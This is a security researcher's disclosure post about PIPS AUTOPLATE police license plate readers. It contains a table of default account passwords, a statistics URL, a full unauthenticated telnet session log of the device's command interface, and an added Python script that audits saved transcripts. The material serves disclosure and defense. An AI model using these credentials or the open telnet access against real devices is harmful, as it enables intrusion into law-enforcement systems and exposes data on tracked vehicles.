PIPS Technology AUTOPLATE Automatic License Plate Recognition (ALPR) Multiple Vulnerabilities

PIPS Technology AUTOPLATE is a license plate recognition system used by law enforcement (Shodan search) in stop light camera systems. “PIPS Technology ALPR processors are complete one-box processors for automatic licence plate recognition (ALPR).” By default these devices offer a telnet connection for management that does not require authentication!

They also ship with a series of default accounts and/or passwords:

Component – Account – Password
html – root – ?
pdb – wl_test – wl_test
ves – vesstore – vesstore
jpeg – ftp_boot – ftp_boot

With the html component credentials you can access the web server for information about the camera’s capture statistics:

http://1.2.3.4/cgiC/capture%20st$ats

Camera 1
fields: 1038585
images: 0
plates: 0
reads : 0
good : 0

Camera 2
fields: 1787601
images: 36781
plates: 5440
reads : 1283
good : 1269

Here is a partial log of what the command interface looks like:

Script started on Tue Nov 19 10:27:32 2013
df$ telnet 1.2.3.4
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.

ATZ
P372 application Apr 13 2010 12:29:02
P372 Serial Number: 1234
pcb:1, vers:03, rel:x06, build:3145
RAM: 128M @ 128M EPROM: 512k
Flex vers: 16.0, capabilities 003f
Camera firmware: 4.34
362 epld vers: 13
ANPR enabled for: USA Louisiana
Operating system: C EXECUTIVE 3.3
eprom image checksum: 1408
application crc: 4714
current config crc: 1434
reference config crc: 1434
* Installed options: 00200018
* ... Compact Flash
* ... Basic VES with no security
* ... USA Licenceplate recognition
* PIPS Technology AUTOPLATE ™ license plate recognition
* VES - (violation enforcement system)
>>system show
system
flex: flash;3722acyc.z16
exposure: mem:/expose.cnf
startup: mem:/startup.scr
time_server: 2.3.4.5
alt_time_server: 10.1.1.1
font8: flash;font_8.8k
font16: flash;font_16.32k
route: ves
access_list: mem:/access.txt
sntp_enable: 0x13
daytime_port: 0
time_zone: -6
time_poll: 300
sntp_latency: 1000
sntp_window: 200
sntp_debug: 0
sntp_max: 24
brownout: 125
powerdown: 5000
idle_time: 0
idle_mode: 0x7
plate_type: 1
plate_max: 120
plate_min: 50
t_enable: 0
t_period: 600
sio362_debug: 0
led_current: 7
ftp_debug: 0
tn_timeout: 600
access_debug: 0
cc_eds: 0
reload: 0
ping_mode: 1
ping_port: 10010
sysdump: 0
old_script: 1
* CMD:OK
>>active show
active
days:
start_1:
end_1:
start_2:
end_2:
enable: 0
debug: 0
* CMD:OK
>>client show
client
patch: 1
sum: 0
debug: 0
config: 0
threshold: 50
* CMD:OK

..

>>help
Available Commands are:
system
active
client
vf
jpeg
bmp
ves
anpr
log
pdb
capture
closeloop
trigger
ves diag
ves exc
html
mbip
mail
net
key
dump
show
set
clear
barcode
help
install
test
camera
ftp
reset
shutdown
exit
flash
flex
fs
encrypt
sleep
rtelnet
snap
trap
script
ping
jam
option
ata
cld
dir
ls
md
rd
rm
del
ren
cd
check
copy
cmp
type
cat
mkfs
partition
scan
creat
image
make
destroy
tail
gzip
gunzip
kermit
action
>>rtelnet
Require IP address and optional port parameters
>>trap show
not implemented
* CMD:ERROR 1
>>script show
cannot open script show on local disk
attempting to fetch script from server
script not found on server
* CMD:ERROR 1
>>ping
PING 1.2.3.4 (1.2.3.4): 56 data bytes
64 bytes from 1.2.3.4: icmp_seq=0 ttl=59 time=23 ms
64 bytes from 1.2.3.4: icmp_seq=1 ttl=59 time=32 ms
64 bytes from 1.2.3.4: icmp_seq=2 ttl=59 time=42 ms
64 bytes from 1.2.3.4: icmp_seq=3 ttl=59 time=31 ms

--- 1.2.3.4 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 14/54/42 ms
* CMD:OK
>>dir
mem:/
EVENT .OLD w---- 40790 bytes 19/11/2013 7:35:12
EVENT .LOG w---a 1706 bytes 19/11/2013 17:28:52
TIME .TXT w---a 11 bytes 19/11/2013 17:32:26
SYSTEM .INI w---a 4283 bytes 19/11/2013 7:35:20
EXPOSE .CNF w---a 190 bytes 4/05/2013 1:18:26
VES . w--d- dir 4/05/2013 1:19:06
OPENED . w---- 0 bytes 4/05/2013 1:19:10
SEQ . w---a 8 bytes 19/11/2013 17:31:10
ENTROPY .BIN w---a 112 bytes 19/11/2013 17:23:02
MONITOR .INI w---a 67 bytes 16/10/2013 15:33:56
ACCESS1 .DEF w---a 526 bytes 19/11/2013 17:20:54

10 files, 1 subdirectory. Total Disk Capacity: 2048 k, Total shown here: 46 k
* CMD:OK
>>type event.log
19-Nov-2013 07:35:12:(9) ( start), EVENT LOG START UP
19-Nov-2013 07:35:12:(6) ( start), trimming 23 lines from event log history
19-Nov-2013 07:35:12:(9) ( start), integrity: 40 seconds since last update
19-Nov-2013 07:35:12:(6) ( mon_temp), no temperature sensor
19-Nov-2013 07:35:12:(9) ( start), access control list not present
19-Nov-2013 07:35:12:(9) ( start), software options: 00200018
19-Nov-2013 07:35:16:(9) ( start), Hardware JPEG Chip 1 software option not present
19-Nov-2013 07:35:16:(9) ( start), Hardware JPEG Chip 2 software option not present
19-Nov-2013 07:35:17:(6) ( start), sync set to: 625
19-Nov-2013 07:35:17:(9) ( stream), Platform will not support streaming video
19-Nov-2013 07:35:17:(9) ( ves), Software options set are not compatable with encryption or context capture
19-Nov-2013 07:35:17:(9) ( vid_events), VIDEO: P372 twin video input process starting

..

>>cat system.ini
[net]
mask=255.255.255.224
bcast=192.200.200.255
gateway=1.2.3.1
script=mem:/net01.scr
speed=0

..

telnet> close
Connection closed.
df$ exit
exit

Script done on Tue Nov 19 10:33:06 2013
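
For operators auditing their own units, the weaknesses visible in the session log above can be checked offline against a saved capture. This is an added example, not code from the original post or from PIPS Technology; the finding names, the expectation that an authenticated session shows a login or password prompt before the first `>>`, and the reading of a missing `access_list` file as an unenforced ACL are assumptions.

```python
import re

# Constructed sample: a shortened capture in the same shape as the log above.
SAMPLE = """\
Connected to 1.2.3.4.
Escape character is '^]'.

ATZ
P372 application Apr 13 2010 12:29:02
* ... Basic VES with no security
>>system show
system
access_list: mem:/access.txt
* CMD:OK
>>dir
mem:/
EVENT .LOG w---a 1706 bytes 19/11/2013 17:28:52
ACCESS1 .DEF w---a 526 bytes 19/11/2013 17:20:54
* CMD:OK
>>type event.log
19-Nov-2013 07:35:12:(9) ( start), access control list not present
"""

AUTH_PROMPT = re.compile(r"(?i)\b(login|password|username)\s*:")
DIR_ENTRY = re.compile(r"^(\S+) +\.(\S*) +\S+ +(?:\d+ bytes|dir)", re.M)

def audit_transcript(text):
    """Return sorted finding ids (hypothetical names) for one saved session."""
    findings = set()
    lines = text.splitlines()
    # 1. Lines before the first '>>' prompt: did the device ask for credentials?
    first = next((i for i, l in enumerate(lines) if l.startswith(">>")), None)
    if first is not None and not any(AUTH_PROMPT.search(l) for l in lines[:first]):
        findings.add("telnet-no-auth")
    # 2. Weak states the device reports about itself (options, event log).
    if re.search(r"(?i)VES with no security", text):
        findings.add("ves-no-security")
    if re.search(r"(?i)access control list not present", text):
        findings.add("acl-not-loaded")
    # 3. Cross-check: does the configured access_list file appear in 'dir'?
    cfg = re.search(r"^access_list:\s*(\S+)$", text, re.M)
    files = {f"{n}.{e}".lower().rstrip(".") for n, e in DIR_ENTRY.findall(text)}
    if cfg and files and cfg.group(1).rsplit("/", 1)[-1].lower() not in files:
        findings.add("acl-file-missing")
    return sorted(findings)

if __name__ == "__main__":
    print(audit_transcript(SAMPLE))
```
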


9 Responses to “PIPS Technology AUTOPLATE Automatic License Plate Recognition (ALPR) Multiple Vulnerabilities”

  1. Snuppy.dk » License Plate Readers Exposed! How Public Safety Agencies Responded to Major Vulnerabilities in Vehicle Surveillance Tech Says:

    […] a researcher named Darius Freamon found that you could access the control panels via Telnet and generate statistics about plate […]

  2. License Plate Readers Exposed! How Public Safety Agencies Responded to Major Vulnerabilities in Vehicle Surveillance Tech | Michigan Standard Says:

    […] a researcher named Darius Freamon found that you could access the control panels via Telnet and generate statistics about plate […]

  3. License Plate Readers Exposed! How Public Safety Agencies Responded to Major Vulnerabilities in Vehicle Surveillance Tech | Electronic Frontier Foundation Says:

    […] a researcher named Darius Freamon found that you could access the control panels via Telnet and generate statistics about plate […]

  4. Here’s What Public Safety Agencies Think About Automated License Plate Recognition  | Monterey Blades Says:

    […] a researcher named Darius Freamon found that you could access the control panels via Telnet and generate statistics about plate […]

  5. License Plate Readers Exposed! How Public Safety Agencies Responded to Major Vulnerabilities in Vehicle Surveillance Tech | Nwo Report Says:

    […] a researcher named Darius Freamon found that you could access the control panels via Telnet and generate statistics about plate […]

  6. Police license plate readers are still exposed on the internet | ADMK Agency Says:

    […] Freamon, a security researcher, was one of the first to find police ALPR cameras in 2014 on Shodan, a search engine for exposed databases and […]

  7. Police license plate readers are still exposed on the internet | TECHNEWZZ Says:

    […] Freamon, a security researcher, was one of the first to find police ALPR cameras in 2014 on Shodan, a search engine for exposed databases and […]

  8. Security: Police registration code readers are level-headed exposed on the fetch – FutureTechRumors Says:

    […] Freamon, a security researcher, used to be one of the first to search out police ALPR cameras in 2014 on Shodan, a search engine for exposed databases and […]

  9. Police license plate readers are still exposed on the internet - SecureWeek Says:

    […] Freamon, a security researcher, was one of the first to find police ALPR cameras in 2014 on Shodan, a search engine for databases and devices […]
